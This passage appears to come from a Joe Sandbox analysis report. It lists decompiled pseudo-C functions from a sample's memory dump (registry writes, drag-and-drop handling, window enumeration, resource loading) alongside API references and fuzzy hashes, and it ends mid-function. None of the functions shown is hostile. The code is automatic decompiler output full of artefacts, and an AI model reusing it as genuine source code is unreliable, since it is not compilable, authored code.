                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MessageSend$Capture
                  • String ID:
                  • API String ID: 1665607226-0
                  • Opcode ID: caaefa77a2ec4d08105200073c0787d47354c2d8573f8946a8549505833edc8d
                  • Instruction ID: b9673430c9843edded79f004319254fc547e9314b671ad51b4fc7d094086bcde
                  • Opcode Fuzzy Hash: caaefa77a2ec4d08105200073c0787d47354c2d8573f8946a8549505833edc8d
                  • Instruction Fuzzy Hash: F00121313502557BDB302B638C8DFDB3E7ADFC9F10F150479B604AA1EBCAA54890D624
                  Uniqueness

                  Uniqueness Score: 0.31%

                  Function 0041E43D, Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E0041E43D(void* __ecx, intOrPtr __edx, WCHAR* _a4, short* _a8, char _a12) {
				signed int _v8;
				short _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				WCHAR* _t21;
				short* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					swprintf( &_v40, 0x10, L"%d", _a12);
					_t18 = WritePrivateProfileStringW(_t29, _t24,  &_v40,  *(_t30 + 0x68));
				} else {
					_t30 = E0041E3F5(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExW(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E00427DFF(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                  0x0041e43d
                  0x0041e445
                  0x0041e44c
                  0x0041e450
                  0x0041e454
                  0x0041e45b
                  0x0041e45e
                  0x0041e49e
                  0x0041e4af
                  0x0041e460
                  0x0041e466
                  0x0041e46a
                  0x0041e478
                  0x0041e47f
                  0x0041e481
                  0x0041e48b
                  0x0041e48b
                  0x0041e46a
                  0x0041e4c3

                  APIs
                  • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 0041E478
                  • RegCloseKey.ADVAPI32(00000000), ref: 0041E481
                  • swprintf.LIBCMT ref: 0041E49E
                  • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041E4AF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                  • String ID:
                  • API String ID: 22681860-0
                  • Opcode ID: 48e4a31b04de04860f7533b672171687b8347594666ad1bd78a6cd8ee1069714
                  • Instruction ID: d5b0184e989ef4cbf1e6960da441591227b783d346d9c5bf8dc3b8f9a138e00e
                  • Opcode Fuzzy Hash: 48e4a31b04de04860f7533b672171687b8347594666ad1bd78a6cd8ee1069714
                  • Instruction Fuzzy Hash: 2E01C076A00318BBDB10DF659C45FEF77ACEF49B08F14042AFA01A7180DA78ED1187A9
                  Uniqueness

                  Uniqueness Score: 0.43%

                  Function 004166D9, Relevance: 6.1, APIs: 4, Instructions: 53fileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 73%
                  			E004166D9(void* __ecx, intOrPtr __edx, void* __eflags, void* _a4) {
				signed int _v8;
				short _v528;
				signed int _v532;
				int _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t18;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t38;
				void* _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t44;
				signed int _t48;
				void* _t51;

				_t51 = __eflags;
				_t38 = __edx;
				_t33 = __ecx;
				_t46 = _t48;
				_t18 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t18 ^ _t48;
				_t31 = _a4;
				_push(_t39);
				E0040E20E(_t31, _t33, SetActiveWindow( *(__ecx + 0x20)));
				_v536 = DragQueryFileW(_t31, 0xffffffff, 0, 0);
				_t24 = E0042083D(_t31, _t39, DragQueryFileW, _t51);
				_v532 = _v532 & 0x00000000;
				_t40 =  *((intOrPtr*)(_t24 + 4));
				if(_v536 > 0) {
					do {
						DragQueryFileW(_t31, _v532,  &_v528, 0x104);
						 *((intOrPtr*)( *_t40 + 0x88))( &_v528);
						_v532 = _v532 + 1;
						_t24 = _v532;
					} while (_v532 < _v536);
				}
				DragFinish(_t31);
				_pop(_t41);
				_pop(_t44);
				_pop(_t32);
				return E00427DFF(_t24, _t32, _v8 ^ _t46, _t38, _t41, _t44);
			}





















                  0x004166d9
                  0x004166d9
                  0x004166d9
                  0x004166dc
                  0x004166e4
                  0x004166eb
                  0x004166ef
                  0x004166f3
                  0x00416700
                  0x00416714
                  0x0041671a
                  0x0041671f
                  0x0041672d
                  0x00416730
                  0x00416732
                  0x00416745
                  0x00416752
                  0x00416758
                  0x0041675e
                  0x00416764
                  0x00416732
                  0x0041676d
                  0x00416776
                  0x00416777
                  0x0041677a
                  0x00416781

                  APIs
                  • SetActiveWindow.USER32(?), ref: 004166F9
                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00416712
                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00416745
                  • DragFinish.SHELL32(?), ref: 0041676D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Drag$FileQuery$ActiveFinishWindow
                  • String ID:
                  • API String ID: 892977027-0
                  • Opcode ID: a5cf6b076f4144340afdfd0d45fdcb9b6a611b85cf84661871ea831614a1f8ae
                  • Instruction ID: e8fc85845f8c1f4b30ec2a3a8a0d79ecfce16764fac14ddc6333a10d0db89026
                  • Opcode Fuzzy Hash: a5cf6b076f4144340afdfd0d45fdcb9b6a611b85cf84661871ea831614a1f8ae
                  • Instruction Fuzzy Hash: 6E115171A40218ABCB10EB64DD89BEEB7B8FB54310F1145EAF529A7191CA749D80CF64
                  Uniqueness

                  Uniqueness Score: 0.58%

                  Function 00427034, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                  Download Yara Rule
                  C-Code - Quality: 94%
                  			E00427034(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				void* __edi;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t19;
				void* _t20;
				struct HWND__* _t22;
				struct HWND__* _t23;
				struct HWND__* _t26;

				_t20 = __edx;
				_t8 = _a8;
				_v12.x = _t8->x;
				_t19 = _t8->y;
				_push(_t19);
				_v12.y = _t19;
				_t9 = WindowFromPoint( *_t8);
				_t26 = _t9;
				if(_t26 != 0) {
					_t22 = GetParent(_t26);
					if(_t22 == 0 || E00420A0C(__ebx, _t20, _t22, _t22, 2) == 0) {
						ScreenToClient(_t26,  &_v12);
						_t23 = E00420AB2(_t26, _v12.x, _v12.y);
						if(_t23 == 0) {
							L6:
							_t9 = _t26;
						} else {
							_t14 = IsWindowEnabled(_t23);
							_t9 = _t23;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t22;
					}
				}
				return _t9;
			}













                  0x00427034
                  0x0042703b
                  0x00427041
                  0x00427044
                  0x00427047
                  0x0042704a
                  0x0042704d
                  0x00427053
                  0x00427057
                  0x00427061
                  0x00427065
                  0x0042707c
                  0x0042708e
                  0x00427092
                  0x004270a1
                  0x004270a1
                  0x00427094
                  0x00427095
                  0x0042709d
                  0x0042709f
                  0x00000000
                  0x00000000
                  0x0042709f
                  0x00427073
                  0x00427073
                  0x00427073
                  0x004270a3
                  0x004270a6

                  APIs
                  • WindowFromPoint.USER32(?,?), ref: 0042704D
                  • GetParent.USER32(00000000), ref: 0042705B
                  • ScreenToClient.USER32(00000000,?), ref: 0042707C
                  • IsWindowEnabled.USER32(00000000), ref: 00427095
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$ClientEnabledFromParentPointScreen
                  • String ID:
                  • API String ID: 1871804413-0
                  • Opcode ID: b94c142eb55133eaace89e579fe40d321248e6ca5a2608be5367493918d0daee
                  • Instruction ID: 502f2b470de6b6ce7da8eb33fd0840b90473116ee06410ed5761847683583fbf
                  • Opcode Fuzzy Hash: b94c142eb55133eaace89e579fe40d321248e6ca5a2608be5367493918d0daee
                  • Instruction Fuzzy Hash: 5501D436704620BF87129B58EC08D6FBBB9EFC5740B54006AF900D3310EB39DD058759
                  Uniqueness

                  Uniqueness Score: 0.47%

                  Function 0040ED9C, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                  Download Yara Rule
                  C-Code - Quality: 77%
                  			E0040ED9C(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, int _a12, long _a16, struct HWND__* _a20, struct HWND__* _a24) {
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t16;
				struct HWND__* _t18;
				struct HWND__* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				struct HWND__* _t25;

				_t23 = __ecx;
				_t22 = __ebx;
				_t24 = GetTopWindow;
				_t16 = GetTopWindow(_a4);
				while(1) {
					_t25 = _t16;
					if(_t25 == 0) {
						break;
					}
					__eflags = _a24;
					if(__eflags == 0) {
						SendMessageW(_t25, _a8, _a12, _a16);
					} else {
						_t20 = E0040E23A(_t22, _t23, _t24, _t25, __eflags, _t25);
						__eflags = _t20;
						if(__eflags != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x20)));
							_push(_t20);
							E0040EAB1(_t22, _t24, _t25, __eflags);
						}
					}
					__eflags = _a20;
					if(_a20 != 0) {
						_t18 = GetTopWindow(_t25);
						__eflags = _t18;
						if(_t18 != 0) {
							E0040ED9C(_t22, _t23, _t25, _a8, _a12, _a16, _a20, _a24);
						}
					}
					_t16 = GetWindow(_t25, 2);
				}
				return _t16;
			}













                  0x0040ed9c
                  0x0040ed9c
                  0x0040eda6
                  0x0040edac
                  0x0040ee0f
                  0x0040ee0f
                  0x0040ee13
                  0x00000000
                  0x00000000
                  0x0040edb0
                  0x0040edb4
                  0x0040edde
                  0x0040edb6
                  0x0040edb7
                  0x0040edbc
                  0x0040edbe
                  0x0040edc0
                  0x0040edc3
                  0x0040edc6
                  0x0040edc9
                  0x0040edcc
                  0x0040edcd
                  0x0040edcd
                  0x0040edbe
                  0x0040ede4
                  0x0040ede8
                  0x0040edeb
                  0x0040eded
                  0x0040edef
                  0x0040ee01
                  0x0040ee01
                  0x0040edef
                  0x0040ee09
                  0x0040ee09
                  0x0040ee18

                  APIs
                  • GetTopWindow.USER32(004089E5), ref: 0040EDAC
                  • GetTopWindow.USER32(00000000), ref: 0040EDEB
                  • GetWindow.USER32(00000000,00000002), ref: 0040EE09
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window
                  • String ID:
                  • API String ID: 2353593579-0
                  • Opcode ID: ef9b084704a80eb7edb457014c17e07389a504682be50e31a57e7e0b16d9c132
                  • Instruction ID: f063a54ea87c3ee12856bf1bbb26572acce20518b4a8890f1bda63ba8ec4a677
                  • Opcode Fuzzy Hash: ef9b084704a80eb7edb457014c17e07389a504682be50e31a57e7e0b16d9c132
                  • Instruction Fuzzy Hash: F201ED3200111ABBCF226F52DC09EDF3A2AEF58364F044426FA14651A1C739C971EBEA
                  Uniqueness

                  Uniqueness Score: 3.15%

                  Function 0040E55A, Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E0040E55A(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				struct HWND__* _t9;
				struct HWND__* _t10;
				void* _t14;
				void* _t15;
				struct HWND__* _t16;
				struct HWND__* _t17;

				_t14 = __ecx;
				_t13 = __ebx;
				_t9 = GetDlgItem(_a4, _a8);
				_t15 = GetTopWindow;
				_t16 = _t9;
				if(_t16 == 0) {
					L6:
					_t10 = GetTopWindow(_a4);
					while(1) {
						_t17 = _t10;
						__eflags = _t17;
						if(_t17 == 0) {
							goto L10;
						}
						_t10 = E0040E55A(_t13, _t14, _t17, _a8, _a12);
						__eflags = _t10;
						if(_t10 == 0) {
							_t10 = GetWindow(_t17, 2);
							continue;
						}
						goto L10;
					}
				} else {
					if(GetTopWindow(_t16) == 0) {
						L3:
						_push(_t16);
						if(_a12 == 0) {
							return E0040E20E(_t13, _t14);
						}
						_t10 = E0040E23A(_t13, _t14, _t15, _t16, __eflags);
						__eflags = _t10;
						if(_t10 == 0) {
							goto L6;
						}
					} else {
						_t10 = E0040E55A(__ebx, _t14, _t16, _a8, _a12);
						if(_t10 == 0) {
							goto L3;
						}
					}
				}
				L10:
				return _t10;
			}











                  0x0040e55a
                  0x0040e55a
                  0x0040e567
                  0x0040e56d
                  0x0040e573
                  0x0040e577
                  0x0040e5a7
                  0x0040e5aa
                  0x0040e5c7
                  0x0040e5c7
                  0x0040e5c9
                  0x0040e5cb
                  0x00000000
                  0x00000000
                  0x0040e5b5
                  0x0040e5ba
                  0x0040e5bc
                  0x0040e5c1
                  0x00000000
                  0x0040e5c1
                  0x00000000
                  0x0040e5bc
                  0x0040e579
                  0x0040e57e
                  0x0040e590
                  0x0040e594
                  0x0040e595
                  0x00000000
                  0x0040e597
                  0x0040e59e
                  0x0040e5a3
                  0x0040e5a5
                  0x00000000
                  0x00000000
                  0x0040e580
                  0x0040e587
                  0x0040e58e
                  0x00000000
                  0x00000000
                  0x0040e58e
                  0x0040e57e
                  0x0040e5d0
                  0x0040e5d0

                  APIs
                  • GetDlgItem.USER32(?,?), ref: 0040E567
                  • GetTopWindow.USER32(00000000), ref: 0040E57A
                    • Part of subcall function 0040E55A: GetWindow.USER32(00000000,00000002), ref: 0040E5C1
                  • GetTopWindow.USER32(?), ref: 0040E5AA
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Item
                  • String ID:
                  • API String ID: 369458955-0
                  • Opcode ID: 03f261cb7e1c27f1ca65299cef57b8ad1bee42e7a860e11b943b9d1485bb4500
                  • Instruction ID: dab8bcbfec70b838be1bc8d0ed6771cf35bb7575be5b57fc64af9fee46ed669e
                  • Opcode Fuzzy Hash: 03f261cb7e1c27f1ca65299cef57b8ad1bee42e7a860e11b943b9d1485bb4500
                  • Instruction Fuzzy Hash: B60121320016157BCB226BA38C15E9F3AA9AF54368F054C36FD04B5291FB39CA719A99
                  Uniqueness

                  Uniqueness Score: 2.84%

                  Function 00431FE1, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00431FE1(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E004318D2(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E004319C2(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00431EE7(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00431E2C(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}






                  0x00431fe6
                  0x00431fec
                  0x0043205f
                  0x00000000
                  0x00431ff3
                  0x00431ff3
                  0x00431ff6
                  0x00432011
                  0x00432014
                  0x00432034
                  0x00432046
                  0x00432016
                  0x00432016
                  0x00432019
                  0x00000000
                  0x0043201b
                  0x0043202d
                  0x0043202d
                  0x00432019
                  0x00432064
                  0x00432068
                  0x00431ff8
                  0x00432010
                  0x00432010
                  0x00431ff6

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction ID: 480a460c25ce70ccdb1b851d193dca5c4b5a2c3da5b3a1c0199ccf3d908bd187
                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction Fuzzy Hash: A7113D7200014ABBCF2A5E85CD418EE3F72BB1C354F599416FB2859131C27AC9B6EB85
                  Uniqueness

                  Uniqueness Score: 1.11%

                  Function 0041155E, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0041155E(intOrPtr __ecx, WCHAR* _a4) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				struct HRSRC__* _t10;
				void* _t13;
				void* _t18;
				void* _t20;
				void* _t21;
				struct HINSTANCE__* _t23;

				_push(__ecx);
				_push(_t20);
				_t13 = 0;
				_t18 = 0;
				_v8 = __ecx;
				_t24 = _a4;
				if(_a4 == 0) {
					L4:
					_t21 = E004110D6(_v8, _t18);
					if(_t18 != 0 && _t13 != 0) {
						FreeResource(_t13);
					}
					_t7 = _t21;
				} else {
					_t23 =  *(E0042083D(0, 0, _t20, _t24) + 0xc);
					_t10 = FindResourceW(_t23, _a4, 0xf0);
					if(_t10 == 0) {
						goto L4;
					} else {
						_t7 = LoadResource(_t23, _t10);
						_t13 = _t7;
						if(_t13 != 0) {
							_t18 = LockResource(_t13);
							goto L4;
						}
					}
				}
				return _t7;
			}















                  0x00411563
                  0x00411565
                  0x00411567
                  0x00411569
                  0x0041156b
                  0x0041156e
                  0x00411571
                  0x004115a5
                  0x004115ae
                  0x004115b2
                  0x004115b9
                  0x004115b9
                  0x004115bf
                  0x00411573
                  0x00411578
                  0x00411584
                  0x0041158c
                  0x00000000
                  0x0041158e
                  0x00411590
                  0x00411596
                  0x0041159a
                  0x004115a3
                  0x00000000
                  0x004115a3
                  0x0041159a
                  0x0041158c
                  0x004115c5

                  APIs
                  • FindResourceW.KERNEL32(?,?,000000F0), ref: 00411584
                  • LoadResource.KERNEL32(?,00000000), ref: 00411590
                  • LockResource.KERNEL32(00000000), ref: 0041159D
                  • FreeResource.KERNEL32(00000000), ref: 004115B9
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 3dc3dfd1e8df1ceea7063c1c51193e157d3b00cde397256258ea7c84e2ab7d3e
                  • Instruction ID: 5d1ee5ff1e7846fe990d0a7bc3f704cc9595d8b5920c94905c43643aa6bbd954
                  • Opcode Fuzzy Hash: 3dc3dfd1e8df1ceea7063c1c51193e157d3b00cde397256258ea7c84e2ab7d3e
                  • Instruction Fuzzy Hash: 2AF0C872641211BB9B105FE6AC88D9BB6AEAFC4350708407BFF0693321DE76DE41866D
                  Uniqueness

                  Uniqueness Score: 0.08%

                  Function 0041A572, Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0041A572(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v16;
				int _t12;
				int _t16;
				int _t18;
				intOrPtr _t19;
				void* _t24;
				intOrPtr* _t27;

				_t19 = _a4;
				_t27 = __ecx;
				E00422F7B(__ecx, _t19, _a8);
				_t12 = E00411D59(__ecx);
				if((_t12 & 0x00000100) != 0) {
					_t12 = IsZoomed(GetParent( *(__ecx + 0x20)));
					if(_t12 == 0) {
						 *((intOrPtr*)( *_t27 + 0x118))(0x407, 0,  &_v16, _t24);
						_t16 = GetSystemMetrics(5);
						_t18 = GetSystemMetrics(2);
						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - _t16 + _t16 - _v16 - _t18;
						return _t18;
					}
				}
				return _t12;
			}










                  0x0041a57b
                  0x0041a582
                  0x0041a585
                  0x0041a58c
                  0x0041a596
                  0x0041a5a2
                  0x0041a5aa
                  0x0041a5bc
                  0x0041a5ca
                  0x0041a5d8
                  0x0041a5dc
                  0x00000000
                  0x0041a5df
                  0x0041a5aa
                  0x0041a5e3

                  APIs
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • GetParent.USER32(?), ref: 0041A59B
                  • IsZoomed.USER32(00000000), ref: 0041A5A2
                  • GetSystemMetrics.USER32(00000005), ref: 0041A5CA
                  • GetSystemMetrics.USER32(00000002), ref: 0041A5D8
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: MetricsSystem$LongParentWindowZoomed
                  • String ID:
                  • API String ID: 3909876373-0
                  • Opcode ID: faaa4cde9a5ef9ee03d55ec9688de346d7d87ffdd55fc2758e838e75c0f64098
                  • Instruction ID: 9575901db201dedaf485c9c3866215073a130650604f3e258b6ccb39a7ec58f1
                  • Opcode Fuzzy Hash: faaa4cde9a5ef9ee03d55ec9688de346d7d87ffdd55fc2758e838e75c0f64098
                  • Instruction Fuzzy Hash: A801D6327001107BDB106BB9DC4EB9ABBB8EF44754F014125FB45EB291EA74AC10CBA5
                  Uniqueness

                  Uniqueness Score: 1.40%

                  Function 0040C767, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040C767(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t21;
				void* _t22;
				void* _t23;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E00420A0C(_t21, _t22, _t23, _a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectW(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						return 1;
					}
				}
			}










                  0x0040c773
                  0x0040c7d8
                  0x00000000
                  0x0040c77b
                  0x0040c77b
                  0x0040c781
                  0x00000000
                  0x0040c79e
                  0x0040c7a7
                  0x0040c7b3
                  0x0040c7b9
                  0x0040c7bf
                  0x0040c7c3
                  0x0040c7c3
                  0x0040c7cd
                  0x00000000
                  0x0040c7d5
                  0x0040c781

                  APIs
                  • GetObjectW.GDI32(00000000,0000000C,?), ref: 0040C7A7
                  • SetBkColor.GDI32(00000000,00000000), ref: 0040C7B3
                  • GetSysColor.USER32(00000008), ref: 0040C7C3
                  • SetTextColor.GDI32(00000000,?), ref: 0040C7CD
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Color$ObjectText
                  • String ID:
                  • API String ID: 829078354-0
                  • Opcode ID: 44bb407b157c777e29b2fd60ab9644da379b406887b12a8ad4251438dfba1bba
                  • Instruction ID: 8d542212d64176848ff7a4e1bf7f81d72017eef1945501ed0f49d49856de4143
                  • Opcode Fuzzy Hash: 44bb407b157c777e29b2fd60ab9644da379b406887b12a8ad4251438dfba1bba
                  • Instruction Fuzzy Hash: 6F012C3118010AEBDB215F64DD89AAB3BB6EB04315F504633F912E61E0D734C860DF9A
                  Uniqueness

                  Uniqueness Score: 0.37%

                  Function 0040E7C5, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 88%
                  			E0040E7C5(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;

				_t15 = __ecx;
				if((E00411D59(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E0040E168(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t18 = E0040CC4F();
